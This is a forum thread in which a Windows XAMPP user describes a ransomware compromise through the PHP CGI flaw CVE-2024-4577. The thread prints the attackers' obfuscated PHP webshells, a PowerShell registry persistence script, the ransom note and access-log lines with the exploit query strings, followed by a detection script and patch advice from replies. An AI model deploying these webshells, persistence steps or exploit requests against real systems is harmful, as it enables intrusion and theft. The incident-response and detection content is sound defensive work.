w1230147 posted on 2024-6-13 23:11

The latest PHP CGI vulnerability is getting XAMPP and PHP users hacked

This post was last edited by w1230147 on 2024-6-13 23:22

Recently the API server I built myself on XAMPP has repeatedly been compromised through the PHP CGI vulnerability and encrypted for ransom. Huorong antivirus put up no resistance whatsoever, and all of my files ended up encrypted.
The fix posted by an expert is attached at the end of the post.


Ransom note
send 0.1btc to my address:bc1qnuxx83nd4keeegrumtnu8kup8g02yzgff6z53l. contact email:service@cyberkiller.xyz,if you can't contact my email, please contact some data recovery company(suggest taobao.com), may they can contact to me .your id:

Speechless. Luckily I had been using the free Alibaba Cloud Drive to keep real-time backups of the critical applications. I reinstalled the cloud server; rebuilding the environment took more than four hours.


Then I installed Tencent PC Manager and 360 Security Guard, which do provide some protection once malicious code starts running, but the hackers could still use the vulnerability to create an administrator account, drop exe and dll files and a hotdoc folder in critical system locations, and create malicious PHP and PowerShell scripts. I was too scared to even keep the HTTP service running. I closed port 80 and tightened the firewall settings, but it made no difference at all.

Here are the traces the intruders left behind:

<?php
@error_reporting(0);
      function Decrypt($data)
      {
                $key="e45e329feb5d925b";
                return openssl_decrypt(base64_decode($data), "AES-128-ECB", $key,OPENSSL_PKCS1_PADDING);
      }
$post=Decrypt(file_get_contents("php://input"));
@eval($post);
?>

<?php
$p=$_COOKIE;(count($p)==12&&in_array(gettype($p).count($p),$p))?(($p=substr($p,5).substr($p,8).substr($p,4).substr($p,5).substr($p,5).substr($p,1).substr($p,2).substr($p,3))&&($p=$p(substr($p(substr($p,15)),12)))&&($p=$p($p,$p(substr($p(substr($p,13)),14))))&&$p()):$p;
?>

Mobile_config
<?php $NotFound=create_function(base64_decode("JA==").chr(114195/993).str_rot13("b").str_rot13("z").chr(708-607),chr(0xc60e/0x1f6).base64_decode("dg==").str_rot13("n").chr(390-282).chr(0x1ae-0x186).chr(0x3ac-0x388).chr(0xd561/0x1db).base64_decode("bw==").base64_decode("bQ==").base64_decode("ZQ==").str_rot13(")").chr(798-739));$part1="OTM2NDM3";$part2="O0BldmFs";$part3="KCRfUE9T";$part4="VFsnc29t";$part5="ZXRoaW5n";$part6="J10pOzI4";$part7="MDkzMTE7";$encoded=$part1.$part2.$part3.$part4.$part5.$part6.$part7;$NotFound(base64_decode($encoded));

$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",Powermanager"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue

New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\Powermanager
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\Powermanager\NetworkProvider
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\Powermanager\NetworkProvider -Name "Class" -Value 2
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\Powermanager\NetworkProvider -Name "Name" -Value Powermanager
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\Powermanager\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\appverify.dll"
Finally, on the afternoon of June 12, 2024, an expert published a way to guard against this vulnerability. Attached are the protection logs from Security Guard and PC Manager after applying the settings. It seems to be plugged for now, but will I be able to hold off the next vulnerability once it gets dug up?

If you never look at the XAMPP logs you don't know; one look and it's a shock.
American and Taiwanese hackers have been relentlessly using the PHP CGI vulnerability to hammer my server. How am I supposed to fight back?
49.85.79.223 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 305
162.216.149.99 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 284
185.59.223.68 - - "GET / HTTP/1.0" 362
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 349
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
146.70.200.117 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe/?%ADd+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0 HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 390
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
146.70.200.117 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe/?%ADd+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0 HTTP/1.1" 204
87.236.176.13 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 283
104.234.204.32 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /assets/.git/config HTTP/1.1" 204
104.234.204.32 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /assets/.git/config HTTP/1.1" 204
218.75.105.196 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.php?%ADd+allow_url_include%3Don+%ADd+auto_prepend_file%3Dphp%3A//input HTTP/1.1" 294
77.36.2.28 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 204
77.36.2.28 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 204
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 345
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 284
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /favicon.ico HTTP/1.1" 204
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /favicon.ico HTTP/1.1" 204
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.php?%ADd%20allow_url_include%3d1%20-d%20auto_prepend_file%3dphp://input HTTP/1.1" 307
123.57.13.121 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 290
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 294
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 345
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /favicon.ico HTTP/1.1" 204
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /favicon.ico HTTP/1.1" 204
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.php?%ADd%20allow_url_include%3d1%20-d%20auto_prepend_file%3dphp://input HTTP/1.1" 257
223.113.128.227 - - "GET / HTTP/1.0" 362
223.113.128.227 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 350
223.113.128.227 TLSv1.3 TLS_AES_256_GCM_SHA384 "t3 12.1.2\n" 226
184.94.212.101 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 204
184.94.212.101 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3dOn+-d+auto_prepend_file%3dphp://input+-d+error_reporting%3d0 HTTP/1.1" 204
106.75.101.79 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 348
106.75.101.79 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /favicon.ico HTTP/1.1" 204
106.75.101.79 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /robots.txt HTTP/1.1" 204
106.75.101.79 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /sitemap.xml HTTP/1.1" 204
106.75.101.79 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /axis2-admin/ HTTP/1.1" 204
106.75.101.79 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /axis2/ HTTP/1.1" 204
106.75.101.79 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /axis2/axis2-admin/ HTTP/1.1" 204
52.160.33.137 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /owa/auth/x.js HTTP/1.1" 204
34.22.208.68 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 292
172.169.2.103 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /version HTTP/1.1" 204
220.133.168.167 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 204
220.133.168.167 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 204
220.133.168.167 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 204
123.57.13.121 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 256

Finally, here is the PHP CGI vulnerability configuration method posted by the expert: https://www.163.com/dy/article/J4GA0GDN05567S03.html
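The requests in the log above are CVE-2024-4577 probes: `%AD` is the soft hyphen (byte 0xAD), which PHP on Windows in affected locales such as Simplified Chinese maps to an ASCII hyphen, so `%ADd` reaches php-cgi as the `-d` option and lets the client inject php.ini directives (`allow_url_include`, `auto_prepend_file=php://input`) that make php-cgi execute the POST body. The script below is an added example, not code from the post or from the expert's article; it parses lines in the shape of the excerpt above (client, TLS version, cipher, request line, size), decodes the query string to bytes and flags the 0xAD-plus-`d` sequence and the injected directives. The sample lines are constructed from the post's excerpt, and `LINE_RE` assumes that exact layout; adjust it for a standard combined log.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Constructed sample in the shape of the XAMPP access-log excerpt in the post
# (client, TLS version, cipher, request line, response size); request lines and
# addresses are copied from that excerpt.
SAMPLE_LOG = """\
49.85.79.223 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 305
185.59.223.68 - - "GET / HTTP/1.0" 362
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
146.70.200.117 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe/?%ADd+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0 HTTP/1.1" 204
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.php?%ADd%20allow_url_include%3d1%20-d%20auto_prepend_file%3dphp://input HTTP/1.1" 307
184.94.212.101 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 204
104.234.204.32 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /assets/.git/config HTTP/1.1" 204
"""

# Layout of the excerpt above (assumed); plain "- -" stands in for the TLS fields.
LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<tls>\S+) (?P<cipher>\S+) "(?P<request>[^"]*)" (?P<size>\d+)$'
)

# 0xAD is the soft hyphen; Windows best-fit mapping turns it into "-", so the
# byte pair 0xAD 'd' is the smuggled "-d" option of the CVE-2024-4577 probes.
SOFT_HYPHEN_DASH = bytes([0xAD]) + b"d"

# php.ini directives the probes in the log inject to run the POST body as PHP.
INI_DIRECTIVES = (b"auto_prepend_file", b"allow_url_include", b"cgi.force_redirect")


def classify_request(request_line):
    """Return the reasons a request line looks like a CVE-2024-4577 probe ([] if none)."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return []                       # malformed request line (e.g. a raw T3 probe)
    query = urlsplit(parts[1]).query
    if not query:
        return []
    # Decode percent-escapes to bytes so "%AD" and "%ad" both become the 0xAD byte.
    raw = unquote_to_bytes(query)
    reasons = []
    if SOFT_HYPHEN_DASH in raw:
        reasons.append("soft_hyphen_dash")
    reasons.extend(d.decode() for d in INI_DIRECTIVES if d in raw)
    return reasons


def scan_log(text):
    """Return a list of (client, request, reasons) for every line that looks like a probe."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m["request"])
        if reasons:
            hits.append((m["client"], m["request"], reasons))
    return hits


def attacker_ips(text):
    """Sorted unique client addresses that sent at least one probe (block-list candidates)."""
    return sorted({client for client, _, _ in scan_log(text)})


if __name__ == "__main__":
    for client, request, reasons in scan_log(SAMPLE_LOG):
        print(f"{client:16} {', '.join(reasons):55} {request[:60]}")
    print("block candidates:", attacker_ips(SAMPLE_LOG))
```

Matching on the decoded 0xAD byte rather than on the literal text `%AD` also catches the lowercase `%add` variant seen in the log. A hit in this scan only proves an attempt; on an unpatched Windows PHP the 204 responses in the excerpt say nothing about whether the body ran, so the host should be treated as compromised until the webshells above are confirmed absent. The lasting fix is a patched PHP build or moving off Windows; the interim mitigation circulated with the DEVCORE advisory is an Apache rewrite rule that rejects query strings beginning with `%ad` (case-insensitive), which is the same condition this scanner flags.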

爱飞的猫 posted on 2024-6-14 10:01

Switch to Linux or upgrade PHP; this vulnerability only affects Windows.

Fixed PHP versions: 8.1.29, 8.2.20, 8.3.8 (see the changelog, keyword CVE-2024-4577)

8.0.x or lower, 8.1.0 to 8.1.28, 8.2.0 to 8.2.19 and 8.3.0 to 8.3.7 do not have this security patch.

ZhjhJZ posted on 2024-6-14 07:48

Huorong antivirus put up no resistance whatsoever; Tencent PC Manager and 360 Security Guard provide some protection once malicious code starts running, but... American and Taiwanese hackers have been relentlessly using the PHP CGI vulnerability to hammer my server. How am I supposed to fight back?

开创者 posted on 2024-6-14 07:23

Install security software; if that doesn't do it, a paid one is fine too.
Otherwise, if you can handle it yourself, you don't need to install any.
This kind of situation is really miserable.
When I ran into it I just shut the machine down;
there really wasn't any good way to solve it.

ZhjhJZ posted on 2024-6-14 07:49

This post was last edited by ZhjhJZ on 2024-6-14 14:02

Huorong antivirus put up no resistance whatsoever; Tencent PC Manager and 360 Security Guard provide some protection once malicious code starts running, but... hackers have been relentlessly using the PHP CGI vulnerability to hammer my server. How to fight back?

third1979 posted on 2024-6-14 08:04

This?? Are 360 and Tencent PC Manager for real???

kissboss posted on 2024-6-14 08:55

I get scanned every day, mostly from foreign IPs; after blocking access from foreign IPs it got a lot quieter.
The odd domestic IP scans me too; I ban each one as I find it.

Liebesfreud posted on 2024-6-14 09:12

Thanks for sharing, boss; this newbie says respect.

一块腹肌Leon posted on 2024-6-14 09:46

This vulnerability seems to target Windows servers on the internet; if you build on CentOS there is no impact.

hinsskg posted on 2024-6-14 10:57

Get a CWPP and a WAF; for the WAF you can use 雷池 (SafeLine) for free. Those PC security products of yours really aren't much use.